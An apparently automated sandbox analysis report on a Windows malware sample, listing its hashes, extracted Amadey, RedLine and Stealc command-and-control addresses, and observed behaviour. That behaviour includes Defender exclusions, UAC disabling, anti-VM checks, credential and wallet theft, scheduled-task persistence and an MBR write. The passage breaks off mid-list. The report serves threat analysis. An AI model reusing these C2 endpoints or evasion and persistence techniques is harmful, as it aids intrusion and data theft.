Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
30-05-2024 03:45
Static task
static1
Behavioral task
behavioral1
Sample
6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral2
Sample
6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe
Resource
win11-20240508-en
General
-
Target
6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe
-
Size
1.8MB
-
MD5
98f52b2094aaa94c5f50bd4aecdca2f6
-
SHA1
b02fcc648aeca6fcf0c1ba6ef23c9da2161911a1
-
SHA256
6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b
-
SHA512
258f21b37a81095af661b859be3dfea6f9ed00ad434e0ce000693660ed1551bab52596020b83459de2b19031cd7c00d2c6b6b8a1232d69866cd6acd40ad524cf
-
SSDEEP
49152:g+dbG+v3neNMlVIoaqqNhiRMU6Al0XyFgdKitw:guiieNMDSqshSMU6Al0Ai
Malware Config
Extracted
amadey
4.21
0e6740
http://147.45.47.155
-
install_dir
9217037dc9
-
install_file
explortu.exe
-
strings_key
8e894a8a4a3d0da8924003a561cfb244
-
url_paths
/ku4Nor9/index.php
Extracted
amadey
4.21
49e482
http://147.45.47.70
-
install_dir
1b29d73536
-
install_file
axplont.exe
-
strings_key
4d31dd1a190d9879c21fac6d87dc0043
-
url_paths
/tr8nomy/index.php
Extracted
redline
1
185.215.113.67:40960
Extracted
redline
@LOGSCLOUDYT_BOT
185.172.128.33:8970
Extracted
stealc
zzvv
http://23.88.106.134
-
url_path
/c73eed764cc59dcb.php
Signatures
-
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
9J1eQpa2VXXz30Zr9qHarAe1.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" 9J1eQpa2VXXz30Zr9qHarAe1.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe family_redline behavioral2/memory/2028-120-0x0000000000370000-0x00000000003C2000-memory.dmp family_redline C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe family_redline behavioral2/memory/2592-179-0x0000000000DD0000-0x0000000000E22000-memory.dmp family_redline -
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe -
Processes:
9J1eQpa2VXXz30Zr9qHarAe1.exefile300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" 9J1eQpa2VXXz30Zr9qHarAe1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" file300un.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
Processes:
6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exeexplortu.exeaxplont.exe7c602150df.exeexplortu.exeexplortu.exe9J1eQpa2VXXz30Zr9qHarAe1.exeaxplont.exe428002730b.exeaxplont.exeaxplont.exeexplortu.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explortu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7c602150df.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explortu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explortu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9J1eQpa2VXXz30Zr9qHarAe1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 428002730b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explortu.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 118 5624 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepowershell.exepid process 2836 powershell.exe 5480 powershell.exe 4488 powershell.exe 5544 powershell.exe 1164 powershell.EXE 4948 powershell.exe 4164 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe428002730b.exeaxplont.exeexplortu.exeaxplont.exe9J1eQpa2VXXz30Zr9qHarAe1.exerundll32.exe7c602150df.exeaxplont.exeexplortu.exeexplortu.exeexplortu.exeaxplont.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 428002730b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explortu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explortu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 428002730b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9J1eQpa2VXXz30Zr9qHarAe1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7c602150df.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explortu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explortu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9J1eQpa2VXXz30Zr9qHarAe1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explortu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explortu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explortu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explortu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7c602150df.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
OXjBook.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Control Panel\International\Geo\Nation OXjBook.exe -
Drops startup file 7 IoCs
Processes:
installutil.exe7GB8EE4ovuV7PRbpqsq3NaNR.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fcZTz4kOrMNOmQeQdqZCgXMO.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xjWtMlWbaf24r8rMr0eKGPZY.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4zVKBf88L4glCOcQQhuoJETT.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9FqxZ1Vgffg8VIdUqs2YeVOO.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RNrwpVBh2tbDd6dStrGxaIyT.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skXHsrY0Sm7TvXknOijWricu.bat installutil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Task Manager.lnk 7GB8EE4ovuV7PRbpqsq3NaNR.exe -
Executes dropped EXE 27 IoCs
Processes:
explortu.exe428002730b.exeaxplont.exeaxplont.exe7c602150df.exeexplortu.exe33333.exefileosn.exeOne.exesvhoost.exelumma1234.exegold.exeswizzzz.exefile300un.exeaVQ0bCqrBKF4mc5oy5N4ZcJW.exe50GOjmdgQviYZtho8Vpb8ZVk.exe7GB8EE4ovuV7PRbpqsq3NaNR.exeaxplont.exeexplortu.exePPSVNmeA5Lq8uO8faTZH5Y7p.exeInstall.exeInstall.exe9J1eQpa2VXXz30Zr9qHarAe1.exeInstall.exeaxplont.exeexplortu.exeOXjBook.exepid process 4744 explortu.exe 3596 428002730b.exe 3160 axplont.exe 960 axplont.exe 3416 7c602150df.exe 1736 explortu.exe 2364 33333.exe 2028 fileosn.exe 4856 One.exe 2592 svhoost.exe 2328 lumma1234.exe 4936 gold.exe 3096 swizzzz.exe 904 file300un.exe 3660 aVQ0bCqrBKF4mc5oy5N4ZcJW.exe 4188 50GOjmdgQviYZtho8Vpb8ZVk.exe 4996 7GB8EE4ovuV7PRbpqsq3NaNR.exe 4352 axplont.exe 2288 explortu.exe 3136 PPSVNmeA5Lq8uO8faTZH5Y7p.exe 5156 Install.exe 4484 Install.exe 3104 9J1eQpa2VXXz30Zr9qHarAe1.exe 4620 Install.exe 5808 axplont.exe 2060 explortu.exe 3420 OXjBook.exe -
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
explortu.exeaxplont.exeexplortu.exeaxplont.exeexplortu.exe6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe428002730b.exeaxplont.exe7c602150df.exeaxplont.exeexplortu.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine explortu.exe Key opened \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine axplont.exe Key opened \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine explortu.exe Key opened \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine axplont.exe Key opened \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine explortu.exe Key opened \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe Key opened \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine 428002730b.exe Key opened \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine axplont.exe Key opened \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine 7c602150df.exe Key opened \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine axplont.exe Key opened \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine explortu.exe -
Loads dropped DLL 2 IoCs
Processes:
50GOjmdgQviYZtho8Vpb8ZVk.exerundll32.exepid process 4188 50GOjmdgQviYZtho8Vpb8ZVk.exe 5624 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\9J1eQpa2VXXz30Zr9qHarAe1.exe themida behavioral2/memory/3104-521-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral2/memory/3104-628-0x0000000140000000-0x000000014159C000-memory.dmp themida -
Processes:
file300un.exe9J1eQpa2VXXz30Zr9qHarAe1.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" 9J1eQpa2VXXz30Zr9qHarAe1.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths file300un.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
explortu.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c602150df.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005001\\7c602150df.exe" explortu.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
file300un.exe9J1eQpa2VXXz30Zr9qHarAe1.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 9J1eQpa2VXXz30Zr9qHarAe1.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file300un.exe -
Drops Chrome extension 2 IoCs
Processes:
OXjBook.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json OXjBook.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json OXjBook.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
Install.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 73 api.myip.com 73 ipinfo.io 95 api.myip.com 96 ipinfo.io -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
50GOjmdgQviYZtho8Vpb8ZVk.exedescription ioc process File opened for modification \??\PhysicalDrive0 50GOjmdgQviYZtho8Vpb8ZVk.exe -
Drops file in System32 directory 35 IoCs
Processes:
OXjBook.exepowershell.exepowershell.exepowershell.exeInstall.exe9J1eQpa2VXXz30Zr9qHarAe1.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 OXjBook.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 OXjBook.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 9J1eQpa2VXXz30Zr9qHarAe1.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 OXjBook.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 9J1eQpa2VXXz30Zr9qHarAe1.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 OXjBook.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol OXjBook.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 9J1eQpa2VXXz30Zr9qHarAe1.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 OXjBook.exe File opened for modification C:\Windows\System32\GroupPolicy 9J1eQpa2VXXz30Zr9qHarAe1.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA OXjBook.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
Processes:
6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exeexplortu.exe428002730b.exeaxplont.exeaxplont.exe7c602150df.exeexplortu.exeaxplont.exeexplortu.exe9J1eQpa2VXXz30Zr9qHarAe1.exeaxplont.exeexplortu.exepid process 4736 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe 4744 explortu.exe 3596 428002730b.exe 3160 axplont.exe 960 axplont.exe 3416 7c602150df.exe 1736 explortu.exe 4352 axplont.exe 2288 explortu.exe 3104 9J1eQpa2VXXz30Zr9qHarAe1.exe 3104 9J1eQpa2VXXz30Zr9qHarAe1.exe 5808 axplont.exe 2060 explortu.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
33333.exelumma1234.exegold.exeswizzzz.exefile300un.exeaVQ0bCqrBKF4mc5oy5N4ZcJW.exeAddInProcess32.exedescription pid process target process PID 2364 set thread context of 3744 2364 33333.exe RegAsm.exe PID 2328 set thread context of 4168 2328 lumma1234.exe RegAsm.exe PID 4936 set thread context of 764 4936 gold.exe RegAsm.exe PID 3096 set thread context of 2536 3096 swizzzz.exe RegAsm.exe PID 904 set thread context of 1032 904 file300un.exe installutil.exe PID 3660 set thread context of 960 3660 aVQ0bCqrBKF4mc5oy5N4ZcJW.exe AddInProcess32.exe PID 3660 set thread context of 5612 3660 aVQ0bCqrBKF4mc5oy5N4ZcJW.exe AddInProcess32.exe PID 960 set thread context of 5676 960 AddInProcess32.exe InstallUtil.exe -
Drops file in Program Files directory 14 IoCs
Processes:
OXjBook.exedescription ioc process File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak OXjBook.exe File created C:\Program Files (x86)\JipyTrDkU\UiiHDSk.xml OXjBook.exe File created C:\Program Files (x86)\tegRANPZONsU2\rDCnQNL.xml OXjBook.exe File created C:\Program Files (x86)\JipyTrDkU\SwrKqm.dll OXjBook.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja OXjBook.exe File created C:\Program Files (x86)\nFLFFjqrQPUn\GIAdIKh.dll OXjBook.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi OXjBook.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi OXjBook.exe File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\ssadNvB.dll OXjBook.exe File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\sEZDWbs.xml OXjBook.exe File created C:\Program Files (x86)\YLgKyOFzWxOqC\mIEObIY.dll OXjBook.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak OXjBook.exe File created C:\Program Files (x86)\tegRANPZONsU2\lSxwxrPKOqOmJ.dll OXjBook.exe File created C:\Program Files (x86)\YLgKyOFzWxOqC\TMmVTFJ.xml OXjBook.exe -
Drops file in Windows directory 6 IoCs
Processes:
6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe428002730b.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\explortu.job 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe File created C:\Windows\Tasks\axplont.job 428002730b.exe File created C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job schtasks.exe File created C:\Windows\Tasks\WKALCIrwIEiqhKBsn.job schtasks.exe File created C:\Windows\Tasks\jiLwFdOzPPQiWLm.job schtasks.exe File created C:\Windows\Tasks\QdCYtDviHOrgqJLgZ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4440 2364 WerFault.exe 33333.exe 1084 4936 WerFault.exe gold.exe 5520 4620 WerFault.exe Install.exe 3116 4484 WerFault.exe Install.exe 896 3420 WerFault.exe OXjBook.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
AddInProcess32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AddInProcess32.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AddInProcess32.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AddInProcess32.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe -
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 4108 schtasks.exe 1292 schtasks.exe 5152 schtasks.exe 2052 schtasks.exe 5628 schtasks.exe 1936 schtasks.exe 5984 schtasks.exe 904 schtasks.exe 5956 schtasks.exe 5292 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4444 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
rundll32.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exerundll32.exepowershell.exepowershell.exeOXjBook.exeInstall.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" OXjBook.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created 